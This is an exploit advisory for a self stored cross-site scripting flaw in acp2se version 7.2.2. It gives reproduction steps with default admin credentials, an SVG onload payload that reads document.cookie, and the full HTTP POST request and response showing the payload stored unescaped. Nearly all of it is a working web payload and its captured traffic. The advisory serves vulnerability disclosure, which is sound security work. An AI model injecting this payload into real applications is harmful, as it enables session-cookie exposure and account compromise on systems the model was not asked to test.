# Exploit Title: Self Stored XSS - acp2sev7.2.2
# Date: 02/2025
# # Exploit Title: Self Stored XSS - acp2sev7.2.2
# Date: 02/2025
# Exploit Author: Andrey Stoykov
# Version: 7.2.2
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2025/02/friday-fun-pentest-series-19-self.html


Self Stored XSS #1:

Steps to Reproduce:

1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with
"admin" / "adminpass"
2. In the field "Put the name of the new Admin" enter the following payload
"><svg onload=prompt(document.cookie)>


// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://192.168.58.168
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://192.168.58.168/acp2se/mul/muladmin.php
Cookie: PHPSESSID=ofq25o83upb0tvch4759uo78f5
Upgrade-Insecure-Requests: 1
Priority: u=0, i

name="><svg onload=prompt(document.cookie)>&submit=Submit


// HTTP Response

HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
<th width='850'>You have added a default Admin. His name is: "><svg
onload=prompt(document.cookie)> .</br> The default password will be:
<b>Admin</b>
[...]